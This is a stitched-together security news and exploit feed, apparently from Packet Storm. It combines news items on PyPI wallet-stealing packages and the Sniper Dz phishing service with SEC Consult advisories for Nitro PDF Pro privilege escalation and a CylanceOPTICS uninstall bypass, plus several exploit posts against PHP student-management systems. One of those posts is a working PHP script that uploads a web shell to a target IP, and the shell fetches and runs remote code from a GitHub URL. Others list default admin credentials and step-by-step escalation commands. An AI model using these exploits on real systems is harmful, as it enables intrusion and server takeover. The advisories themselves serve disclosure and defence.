Checkmarx researchers discovered PyPI malware posing as crypto wallet tools. These malicious packages stole private keys and recovery…

Checkmarx researchers discovered PyPI malware posing as crypto wallet tools. These malicious packages stole private keys and recovery phrases, targeting wallets like Metamask, Trust Wallet, and Exodus.

The cybersecurity researchers at Checkmarx uncovered a series of new supply chain attacks that exploited the Python Package Index (**PyPI**) in September 2024 using malicious packages to target cryptocurrency wallets.

The attack involved a new user on the platform who uploaded several malicious packages designed to steal sensitive wallet data, including private keys and mnemonic phrases. These packages identified as “AtomicDecoderss,” “TrustDecoderss,” “WalletDecoderss,” and “ExodusDecodes,” targeted cryptocurrency wallets including Atomic, Trust Wallet, Metamask, Ronin, TronLink, and Exodus.

According to the Checkmarx **report** shared with Hackread.com ahead of publishing on Tuesday, each package came with a professionally written README file, complete with installation instructions, usage examples, and even “best practices” for virtual environments.

Even more concerning, these documents included fake statistics, making the packages seem like well-maintained and popular projects, thus increasing their credibility and download count.

One of the key tactics used by the attacker was the distribution of functionality across multiple dependencies. Six of the malicious packages relied on a dependency called “cipherbcryptors,” which contained the core malicious code. In the context of a cyberattack, dependencies refer to any external components, systems, software, or third-party services that an organization relies upon to function properly.

Further analysis revealed that threat actors heavily obfuscated the code within the “cipherbcryptors” package, making it difficult for automated security tools and cybersecurity researchers to identify its malicious intent.

Unlike others, these malicious packages didn’t start infecting the device immediately upon installation. Instead, they remained inactive until the user attempted to use certain features. Once the user began using one of the features advertised by the threat actors, the malware would activate and access the targeted user’s cryptocurrency wallet.

It then stole important information, such as private keys and recovery phrases, which are needed to control and access cryptocurrency wallets. The stolen information was then encoded and sent to a server controlled by the attacker.

Malicious packages and the attack flow (Image credit: Checkmarx)

The impact of this type of **supply chain attack** can be severe for the victims. With access to private keys and recovery phrases, attackers can quickly drain cryptocurrency wallets. Due to the irreversible nature of blockchain transactions, once funds are stolen, recovering them is nearly impossible.

Therefore, software developers and unsuspecting users should be cautious of such attacks, especially when downloading packages from the PyPI platform, particularly those that offer cryptocurrency-related services and include access to wallets. **Cybersecurity training for employees** is also important in defending against these attacks, making protection a matter of common sense.

1.  **OpenSSF Launches Malicious Packages Repository**
2.  **Crypto Stealing PyPI Malware Hits Both Windows, Linux Users**
3.  **PyPI Suspends New Projects, Users Due to Malicious Packages**
4.  **Hackers Exploit PyPI to Infiltrate Systems with Python Packages**
5.  **Luna Grabber Malware Hits Roblox Devs Through npm Packages**

New PyPI Malware Poses as Crypto Wallet Tools to Steal Private Keys

The Nitro PDF Pro application uses a .msi installer file (embedded into an executable .exe installer file) for installation. The MSI installer uses custom actions in repair mode in an unsafe way. Attackers with low-privileged system access to a Windows system where Nitro PDF Pro is installed, can exploit the cached MSI installer's custom actions to effectively escalate privileges and get a command prompt running in context of NT AUTHORITY\SYSTEM. Versions prior to 14.26.1.0 and 13.70.8.82 and affected.

SEC Consult Vulnerability Lab Security Advisory < 20240930-0 >  
=======================================================================  
              title: Local Privilege Escalation via MSI Installer  
            product: Nitro PDF Pro  
 vulnerable version: <14.26.1.0  
                     <13.70.8.82  
      fixed version: 14.26.1.0 or higher  
                     13.70.8.82 or higher  
         CVE number: CVE-2024-35288  
             impact: high  
           homepage: https://www.gonitro.com/  
              found: 2023-12-19  
                 by: Sandro Einfeldt  
                     Michael Baer (Office Munich)  
                     SEC Consult Vulnerability Lab 

                     An integrated part of SEC Consult, an Eviden business  
                     Europe | Asia

                     https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"We are on a mission to deliver a one-of-a-kind platform that accelerates   
document productivity for businesses around the world.

Nitro was born in a bustling Melbourne laneway back in 2005. It started   
with a team of three, a single product and a goal to provide the world   
with better tools for everyday work. Our team now spans the globe and   
works with over half of the Fortune 500, but we haven't strayed too far   
from our roots. We put our customers, employees, and communities at the   
center of everything we do."

Source: https://www.gonitro.com/about/our-story

Business recommendation:  
------------------------  
The vendor provides a patch which should be installed immediately.

SEC Consult highly recommends to perform a thorough security review of the  
product conducted by security professionals to identify and resolve potential  
further security issues.

Vulnerability overview/description:  
-----------------------------------  
1) Local Privilege Escalation via MSI Installer (CVE-2024-35288)   
The Nitro PDF Pro application uses a .msi installer file (embedded into an   
executable .exe installer file) for installation. The MSI installer uses custom   
actions in repair mode in an unsafe way. Attackers with low-privileged system   
access to a Windows system where Nitro PDF Pro is installed, can exploit the   
cached MSI installer's custom actions to effectively escalate privileges and get   
a command prompt running in context of NT AUTHORITY\SYSTEM. 

Note:   
This attack does not work using a recent version of the Edge Browser or   
Internet Explorer. A different browser, such as Chrome or Firefox, needs to be   
used. Also make sure, that Edge or IE have not been set as default browser  
and that Firefox or Chrome are not running before attempting to exploit it.  
Otherwise, the spawned process would be running with your own permissions and  
the installer will just add a new tab to the browser, instead of spawning a  
new process with SYSTEM.

Proof of concept:  
-----------------  
1) Local Privilege Escalation via MSI Installer (CVE-2024-35288)  
After the installation of the software in standard configuration, any low-  
privileged user can access the cached (randomly named) .msi file in the   
following directory:

C:\Windows\Installer

A low privileged attacker can start the installer in repair mode   
(which is then running with SYSTEM privileges) without UAC popping up,   
by using the following command:

msiexec.exe /fa C:\Installer\<installer name>.msi

At the end of the repair process, three sub-processes (certutil.exe), called   
by MSI custom actions, perform the following operations:

[SystemFolder]CertUtil –addstore –f "ca" "[APPLICATIONFOLDER]notarius-root-certificate-authority.cer"  
[SystemFolder]CertUtil –addstore –f "ca" "[APPLICATIONFOLDER]notarius-certificate-authority.cer"  
[SystemFolder]CertUtil –addstore –f "ca" "[APPLICATIONFOLDER]notarius-root-certificate-authority_2021-2036.cer"  

The previously mentioned operations get executed in a conhost.exe window in   
the context of NT AUTHORITY\SYSTEM. The attacker can use the appearing   
conhost.exe windows to get an elevated command prompt. Therefore, the attacker   
has to interrupt the execution flow of one of the certutil operations before   
the conhost.exe window closes. This can be done by locking the file operations   
on one of the following files:  

notarius-root-certificate-authority.cer  
notarius-certificate-authority.cer   
notarius-root-certificate-authority_2021-2036.cer

For this purpose, the attacker can use SetOpLock.exe from the following source:

https://github.com/googleprojectzero/symboliclink-testing-tools

To lock all operations on one of the previously mentioned files, the attacker  
has to use the following syntax:

while ($true) {  
   .\SetOpLock.exe <Path> x   
}

For example, to lock the operations on the first of the mentioned files, the   
following command loop can be used:

while ($true) {  
  .\SetOpLock.exe "C:\Program Files\Nitro\PDF Pro\14\notarius-root-certificate-authority.cer" x   
}

The tool will lock any operation on the file until the attacker presses Enter.  
While executing the previously mentioned msiexec-command, multiple operation  
locks will get triggered. The attacker has to skip multiple of them (by  
pressing Enter) until a conhost.exe window opens. The conhost.exe process is   
running with SYSTEM privileges and can be used to escalate privileges. The   
following steps have to be conducted:

1. Right click on the top bar of the conhost.exe window.  
2. Click on "Properties".  
3. Under options, click on the "Legacyconsolemode" link.  
4. Open the link with a browser other than Internet Explorer or Edge (both   
   don't open as SYSTEM in Windows 11).  
5. In the opened browser window press the key combination "CTRL+o".  
6. Type "C:\Windows\System32\cmd.exe" in the top bar and press Enter.

A command prompt should open with the user permission context of   
NT AUTHORITY\SYSTEM. The privileges have been escalated and the system is   
fully compromised.

Vulnerable / tested versions:  
-----------------------------  
The following version has been tested which was the latest version available  
at the time of the test:  
* Nitro PDF Pro 14.18.1.41

According to the vendor, version branch 13 is also affected. The vendor  
confirmed that the following versions are vulnerable:

* Nitro PDF Pro <14.26.1.0  
* Nitro PDF Pro <13.70.8.82

Vendor contact timeline:  
------------------------  
2023-12-22: Contacting vendor through security@gonitro.com; asking for PGP key.  
            No response.  
2024-01-11: Asking whether our email was received  
2024-01-15: Vendor response: high workload, requesting security advisory,  
            PGP key will be shared in another email.   
2024-01-16: No PGP key received, asking again.  
2024-01-17: Sending encrypted security advisory.  
2024-01-30: Asking for a status update.  
2024-02-01: Vendor is currently investigating the issue to ensure it applies  
            to the latest version of the Pro software.  
2024-02-12: Vendor asking for tested Windows version.  
2024-02-13: Tested with Windows 10, referenced advisory information to only  
            use Firefox or Chrome browser, not Edge/IE.  
2024-03-05: Asking for a status update, if the issue could be reproduced, whether  
            we should reserve a CVE number.  
2024-03-07: Vendor will provide update in a few days, few issues in the queue.  
            Will ask internally regarding CVE.  
2024-04-08: Asking for status update. Setting advisory disclosure date  
            to 17th April.  
2024-04-08: Vendor was unable to reproduce issue, asking for a video to  
            verify the issue.  
2024-04-09: Providing POC video to the vendor.  
2024-04-11: Vendor still unable to reproduce.  
            Suggesting short call to demonstrate the issue; no response.  
2024-04-16: Asking how to proceed now.  
            Vendor: was now able to reproduce the issue on Windows 10,  
            patch implementation will be expedited.  
            Telling the vendor that we will wait for the patch, asking  
            if they reserve a CVE.  
2024-05-02: Vendor: CVE is being requested, patch is planned as soon as   
            possible.  
2024-05-02: Confirming advisory release after patch is available and   
            other necessary details (fixed version number, CVE, etc).  
2024-05-21: Vendor is still waiting for CVE.  
2024-05-22: Asking whether the issue is otherwise fixed, asking for version  
            number etc; No response.  
2024-06-17: Asking for status update again, regarding patch & CVE.  
            Fix is completed for current version 14.x, preparing a patch, but  
            also checking previous versions.  
2024-06-21: Vendor informs us that version 13 is also affected which takes  
            more time to backport.   
2024-06-24: Giving more time to patch and coordinate release versions.   
            Questions about CVE.  
2024-06-24: Vendor responds that CVE-2024-35288 can be used.  
2024-07-15: Vendor releases version 14.26.1.0 which includes the fix for v14.  
2024-09-17: Vendor informs us that security update for v13 is scheduled for  
            25th September (seems we did not receive this email).  
2024-09-23: Vendor following up regarding patch schedule & acknowledgement.  
2024-09-24: Confirming receipt of email and patch day, our advisory will be  
            scheduled for early next week.  
2024-09-24: Vendor provides affected version numbers.  
2024-09-25: Asking vendor for clarification regarding version numbers.  
2024-09-25: Vendor sends version numbers for the fix (13.70.8.82, 14.26.1.0)  
2024-09-30: Coordinated release of security advisory.

Solution:  
---------  
The vendor provides a patch in version 13.70.8.82 and 14.26.1.0 which can be  
downloaded from the following URL:  
https://www.gonitro.com/product-details/downloads/pdf-pro

The vendor released a security advisory as well:  
https://www.gonitro.com/security/updates

SEC Consult has also released a blog post on 12th September 2024 regarding MSI  
installer security issues tracked as CVE-2024-38014 and a general fix by  
Microsoft. We have contacted Microsoft to have a more general solution for  
every affected vendor. For further details check out the blog post:  
https://r.sec-consult.com/msi

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab   
An integrated part of SEC Consult, an Eviden business  
Europe | Asia

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Eviden business. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: https://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF Sandro Einfeldt, Michael Baer, Johannes Greil / @2024

Nitro PDF Pro Local Privilege Escalation

Red Hat Security Advisory 2024-7436-03 - The components for Red Hat OpenShift for Windows Containers 10.17.0 are now available. This product release includes bug fixes and security updates for the following packages: windows-machine-config-operator and windows-machine-config-operator-bundle.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_7436.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: Red Hat OpenShift for Windows Containers 10.17.0 product release  
Advisory ID:        RHSA-2024:7436-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:7436  
Issue date:         2024-10-01  
Revision:           03  
CVE Names:            
====================================================================

Summary: 

The components for Red Hat OpenShift for Windows Containers 10.17.0 are now available. This product release includes bug fixes and security updates for the  
following packages: windows-machine-config-operator and  
windows-machine-config-operator-bundle.

Red Hat Product Security has rated this update as having a security impact of  
Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives  
a detailed severity rating, is available for each vulnerability from the CVE  
link(s) in the References section.

Description:

Red Hat OpenShift for Windows Containers allows you to deploy Windows container workloads running on Windows Server containers.

Solution:

CVEs:

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://issues.redhat.com/browse/OCPBUGS-29253  
https://issues.redhat.com/browse/OCPBUGS-30995  
https://issues.redhat.com/browse/OCPBUGS-35936  
https://issues.redhat.com/browse/OCPBUGS-36395  
https://issues.redhat.com/browse/OCPBUGS-36643  
https://issues.redhat.com/browse/WINC-1149  
https://issues.redhat.com/browse/WINC-1172  
https://issues.redhat.com/browse/WINC-1199  
https://issues.redhat.com/browse/WINC-1224  
https://issues.redhat.com/browse/WINC-1305  
https://issues.redhat.com/browse/WINC-1314  
https://issues.redhat.com/browse/WINC-1320  
https://issues.redhat.com/browse/WINC-588

Red Hat Security Advisory 2024-7436-03

Student Study Center Management System version 1.0 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : Student Study Center Management System 1.0 Insecure Settings Vulnerability                                         || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/student-study-center-management-system-using-php-and-mysql/                                 |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload :     Username: admin      Password: Test@123[+] http://127.0.0.1/agms/admin/dashboard.phpGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Student Study Center Management System 1.0 Insecure Settings

Student Management System version 1.0 suffers from an ignored default credential vulnerability.

    =============================================================================================================================================| # Title     : Student Management System v1.0 Insecure Settings Vulnerability                                                              || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://phpgurukul.com/student-management-system-using-php-and-mysql/                                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = Test@123[+] http://127.0.0.1/studentms/admin/dashboard.php Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Student Management System 1.0 Insecure Settings

Student Attendance Management System version 1.0 suffers from a PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : Student Attendance Management System 1.0 code injection Vulnerability                                                       || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/student-attendance-management-system.zip              |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This payload injects php code of your choice into an SHELL.php file. [+] Line 28    Line 37  [+] change the path of the script folder.[+] save payload as poc.php[+] usage from cmd : C:\www\test>php 1.php 127.0.0.1[+] payload : <?phpfunction file_upload($target_ip) {    $file_name = "indoushka.php";    $webshell_payload = "<?php        \$url = 'https://raw.githubusercontent.com/indoushka/txt/main/indoushka.txt';        \$ch = curl_init();        curl_setopt(\$ch, CURLOPT_URL, \$url);        curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true);        \$output = curl_exec(\$ch);        curl_close(\$ch);        if (\$output) {            include 'data://text/plain;base64,' . base64_encode(\$output);        }    ?>";    $post_fields = array(                'name' => 'Hacked By Indoushka',        'email' => 'indoushka4ever@gmail.com',    'contact' => '00213771818860',    'img' => new CURLFile('data://text/plain;base64,' . base64_encode($webshell_payload), 'application/x-php', $file_name),        'qty' => '1'    );    $ch = curl_init();    curl_setopt($ch, CURLOPT_URL, "http://$target_ip/student_attendance/ajax.php?action=save_settings");    curl_setopt($ch, CURLOPT_POST, 1);    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);    $response = curl_exec($ch);    curl_close($ch);    echo "(+) Shell uploaded successfully.\n";    echo "(+) Access the shell at: http://$target_ip/student_attendance/assets/uploads/\n";}if ($argc != 2) {    echo "(+) Usage: php " . $argv[0] . " <target ip>\n";    echo "(+) Example: php " . $argv[0] . " 10.0.0.1\n";    exit(-1);}$target_ip = $argv[1];file_upload($target_ip);Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Student Attendance Management System 1.0 Code Injection

More than 140,000 phishing websites have been found linked to a phishing-as-a-service (PhaaS) platform named Sniper Dz over the past year, indicating that it's being used by a large number of cybercriminals to conduct credential theft.
"For prospective phishers, Sniper Dz offers an online admin panel with a catalog of phishing pages," Palo Alto Networks Unit 42 researchers Shehroze Farooqi,

More than 140,000 phishing websites have been found linked to a phishing-as-a-service (PhaaS) platform named Sniper Dz over the past year, indicating that it's being used by a large number of cybercriminals to conduct credential theft.

"For prospective phishers, Sniper Dz offers an online admin panel with a catalog of phishing pages," Palo Alto Networks Unit 42 researchers Shehroze Farooqi, Howard Tong, and Alex Starov said in a technical report.

"Phishers can either host these phishing pages on Sniper Dz-owned infrastructure or download Sniper Dz phishing templates to host on their own servers."

Perhaps what makes it even more lucrative is that these services are provided for free. That said, the credentials harvested using the phishing sites are also exfiltrated to the operators of the PhaaS platform, a technique that Microsoft calls double theft.

PhaaS platforms have become an increasingly common way for aspiring threat actors to enter the world of cybercrime, allowing even those with little technical expertise to mount phishing attacks at scale.

Such phishing kits can be purchased off of Telegram, with dedicated channels and groups catering to each and every aspect of the attack chain, right from hosting services to sending phishing messages.

Sniper Dz is no exception in that the threat actors operate a Telegram channel with over 7,170 subscribers as of October 1, 2024. The channel was created on May 25, 2020.

Interestingly, a day after the Unit 42 report went live, the people behind the channel have enabled the auto-delete option to automatically clear all posts after one month. This likely suggests an attempt to cover up traces of their activity, although earlier messages remain intact in the chat history.

The PhaaS platform is accessible on the clearnet and requires signing up an account to "get your scams and hack tools," according to the website's home page.

A video uploaded to Vimeo in January 2021 shows that the service offers ready-to-use scam templates for various online sites like X, Facebook, Instagram, Skype, Yahoo, Netflix, Steam, Snapchat, and PayPal in English, Arabic, and French languages. The video has more than 67,000 views to date.

The Hacker News has also identified tutorial videos uploaded to YouTube that take viewers through the different steps required to download templates from Sniper Dz and set up fake landing pages for PUBG and Free Fire on legitimate platforms like Google Blogger.

However, it's not clear if they have any connection to the developers of Sniper Dz, or if they are just customers of the service.

Sniper Dz comes with the ability to host phishing pages on its own infrastructure and provide bespoke links pointing to those pages. These sites are then hidden behind a legitimate proxy server (proxymesh\[.\]com) to prevent detection.

"The group behind Sniper Dz configures this proxy server to automatically load phishing content from its own server without direct communications," the researchers said.

"This technique can help Sniper Dz to protect its backend servers, since the victim's browser or a security crawler will see the proxy server as being responsible for loading the phishing payload."

The other option for cybercriminals is to download phishing page templates offline as HTML files and host them on their own servers. Furthermore, Sniper Dz offers additional tools to convert phishing templates to the Blogger format that could then be hosted on Blogspot domains.

The stolen credentials are ultimately displayed on an admin panel that can be accessed by logging into the clearnet site. Unit 42 said it observed a surge in phishing activity using Sniper Dz, primarily targeting web users in the U.S., starting in July 2024.

"Sniper Dz phishing pages exfiltrate victim credentials and track them through a centralized infrastructure," the researchers said. "This could be helping Sniper Dz collect victim credentials stolen by phishers who use their PhaaS platform."

The development comes as Cisco Talos revealed that attackers are abusing web pages connected to backend SMTP infrastructure, such as account creation form pages and others that trigger an email back to the user, to bypass spam filters and distribute phishing emails.

These attacks take advantage of poor input validation and sanitization prevalent on these web forms to include malicious links and text. Other campaigns conduct credential stuffing attacks against mail servers of legitimate organizations so as to gain access to email accounts and send spam.

"Many websites allow users to sign up for an account and log in to access specific features or content," Talos researcher Jaeson Schultz said. "Typically, upon successful user registration, an email is triggered back to the user to confirm the account."

"In this case, the spammers have overloaded the name field with text and a link, which is unfortunately not validated or sanitized in any way. The resulting email back to the victim contains the spammer's link."

It also follows the discovery of a new email phishing campaign that leverages a seemingly harmless Microsoft Excel document to propagate a fileless variant of Remcos RAT by exploiting a known security flaw (CVE-2017-0199).

"Upon opening the \[Excel\] file, OLE objects are used to trigger the download and execution of a malicious HTA application," Trellix researcher Trishaan Kalra said. "This HTA application subsequently launches a chain of PowerShell commands that culminate in the injection of a fileless Remcos RAT into a legitimate Windows process."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

 Free Sniper Dz Phishing Tools Fuel 140,000+ Cyber Attacks Targeting User Credentials

BlackBerry CylanceOPTICS versions prior to 3.3 MR2 and 3.2 MR5 suffer from an uninstall password bypass vulnerability.

SEC Consult Vulnerability Lab Security Advisory < 20240925-0 >  
=======================================================================  
              title: Uninstall Password Bypass  
            product: BlackBerry CylanceOPTICS Windows Installer Package  
 vulnerable version: CylanceOPTICS <3.3 MR2  
                     CylanceOPTICS <3.2 MR5  
      fixed version: CylanceOPTICS 3.3 MR2  
                     CylanceOPTICS 3.2 MR5  
         CVE number: CVE-2024-35214  
             impact: high  
           homepage: https://www.blackberry.com/us/en/support/cylance  
              found: 2023-12-12  
                 by: Initially by Rene Grubmair (Greiner)  
                     P. Espernberger (Office Leonding)  
                     M. Engleitner (Office Leonding)  
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult, an Eviden business  
                     Europe | Asia

                     https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"CylanceOPTICS is an endpoint detection and response solution that collects  
and analyzes forensic data from devices to identify and resolve threats  
before they impact your organization’s users and data."

Source: https://docs.blackberry.com/en/unified-endpoint-security/blackberry-ues/overview/What-is-BlackBerry-Optics

Business recommendation:  
------------------------  
The vendor provides a patched version which should be installed immediately.

SEC Consult highly recommends to perform a thorough security review of the  
product conducted by security professionals to identify and resolve potential  
further security issues.

Vulnerability overview/description:  
-----------------------------------  
1) Uninstall Password Bypass (CVE-2024-35214)  
Due to the quiet (un-)installation feature offered by the CylanceOPTICS  
application, the uninstaller can be called directly without requiring  
a previously set uninstall password.

In order to exploit this vulnerability, an attacker must have local admin  
rights.

Proof of concept:  
-----------------  
1) Uninstall Password Bypass (CVE-2024-35214)  
The path to the MSI uninstaller can be found by searching the  
Windows Registry for "CylanceOPTICS" which results in the following  
node containing uninstall information for the 64bit application:

HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{6e96194b-ca7b-40a4-badd-7eac94ea62c7}

To uninstall CylanceOPTICS without being prompted for a password,  
the QuietUninstallString command is executed as privileged user on  
the system.

"C:\ProgramData\Package Cache\{6e96194b-ca7b-40a4-badd-7eac94ea62c7}\CylanceOPTICSSetup.exe" /uninstall /quiet

Afterwards, the CylanceOPTICS application is successfully removed.

Vulnerable / tested versions:  
-----------------------------  
The following version has been tested by SEC Consult which was the most  
recent version available at the time of the test:  
* 3.2.2199.0

According to the vendor, all previous versions are affected:  
* CylanceOPTICS <3.3 MR2  
* CylanceOPTICS <3.2 MR5

Vendor contact timeline:  
------------------------  
2024-02-02: Contacting vendor through secure@blackberry.com, case  
            BIRT2024-00128 was created  
2024-02-02: Auto-response, case is being tracked as # BIRT2024-00128  
2024-02-07: Vendor requests settings of the CylanceConsole device.  
            Vendor is currently attempting to reproduce the vulnerability.  
2024-02-08: The requested settings were provided.  
2024-02-09: Vendor confirms the Uninstall Password Bypass vulnerability.  
            Additional information (log files) are requested.  
            Clarification of the impact of the vulnerability is requested.  
2024-02-15: Explanation has been sent. Log files could not be provided  
            as the device has already been reset.  
2024-02-15: The vulnerability was escalated to the development team.  
2024-02-23: Short update was provided outlining the current plan to  
            fix the vulnerability until summer 2024.  
            Vendor commits to bi-weekly updates on their progress.  
2024-04-19: Expected release date (June 3rd) was communicated and  
            the CVE number was provided.  
2024-05-21: Coordination of the joint release date (2024-06-11) and  
            providing the updated security advisory and new CVE number.  
2024-06-07: Vendor released CylanceOPTICS 3.3 MR1 and CylanceOPTICS 3.2 MR4  
            on 4th June. But requests advisory disclosure to be delayed to  
            10th September because of identified weakness in current solution.  
2024-08-20: Vendor releases new version 3.3 MR2 and 3.2 MR5.  
2024-09-25: Coordinated release of security advisory.

SEC Consult was informed about the progress bi-weekly.  
Only the most relevant information is included in the timeline.

Solution:  
---------  
The vendor provides the following patched versions to their customers:  
* CylanceOPTICS 3.3 MR2  
* CylanceOPTICS 3.2 MR5

In addition to the updated versions, the vendor has released an  
optional script which customers can run to remove the old version and replace  
it with the update. New customers, or customers who uninstall /  
reinstall will not need to run the script, nor will existing customers  
who have not configured an Uninstall password.

The vendor provides the following security notes with further information:  
https://support.blackberry.com/pkb/s/article/140080

Workaround:  
-----------  
As a workaround, it is possible to delete the affected CylanceOPTICSSetup.exe  
binary.

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab  
An integrated part of SEC Consult, an Eviden business  
Europe | Asia

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Eviden business. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: https://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF M. Engleitner, P. Espernberger / @2024

BlackBerry CylanceOPTICS Uninstall Password Bypass

A single command line can show you about 20,000 instances of CWE-73 issues with Microsoft Windows.

    Hi @ll,<https://cwe.mitre.org/data/definitions/73.html>CWE-73: External Control of File Name or Pathis a well-known and well-documented weakness.<https://seclists.org/fulldisclosure/2020/Mar/48> as well as<https://skanthak.homepage.t-online.de/offender.html> demonstrate how to(ab)use just one instance of this weakness (introduced about 7 years agowith Microsoft Defender, so-called "security software") due to anenvironment variable in the (registered) path name of an executable fileto gain execution of arbitrary code.But that's of course not the only instance of this VERY EASY to exploitweakness present in ALL versions of Windows since more than 30 (in words:THIRTY) years -- start a command processor and run the following commandline to show about 20,000 instances of path names registered with (user-controlled) environment variables:    REG.exe QUERY HKEY_LOCAL_MACHINE /C /D /F "%*%\\" /Sstay tuned, and far away from the vulnerable crap made in RedmondStefan KanthakPS: just yesterday, Microsoft dared to publish    <https://www.microsoft.com/en-us/security/blog/2024/09/23/securing-our-future-september-2024-progress-update-on-microsofts-secure-future-initiative-sfi/>,    bragging "we've dedicated the equivalent of 34,000 full-time engineers    to SFI-making it the largest cybersecurity engineering effort in history"    What about dedicating the equivalent of just ONE full-time employee to    every instance of just ONE ow Windows weaknesses?

Microsoft CWE-73 Weakness

Student Management System version 1.0 suffers from an insecure cookie handling vulnerability.

**Student Management System 1.0 Insecure Cookie Handling**

Posted Sep 30, 2024

Authored by indoushka

Student Management System version 1.0 suffers from an insecure cookie handling vulnerability.

tags | exploit, insecure cookie handling

SHA-256 | d658fbfc8c6a719141fdd1f2794283b78eab23b21c7970420e8965f026849eba

Download | Favorite | View

**Student Management System 1.0 Insecure Cookie Handling**

    ====================================================================================================================================| # Title     : Student Management System 1.0 Insecure Cookie Handling Vulnerability                                               || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/student-management-system-using-php-and-mysql/                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : document.cookie = "username=user123; path=/; secure; HttpOnly; SameSite=Lax";[+] The default username is admin & The chosen password is user123[+] http://127.0.0.1/studentms/admin/dashboard.php Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,997)
*   Arbitrary (17,113)
*   BBS (2,859)
*   Bypass (1,932)
*   CGI (1,047)
*   Code Execution (7,925)
*   Conference (693)
*   Cracker (845)
*   CSRF (3,434)
*   DoS (25,304)
*   Encryption (2,395)
*   Exploit (54,342)
*   File Inclusion (4,278)
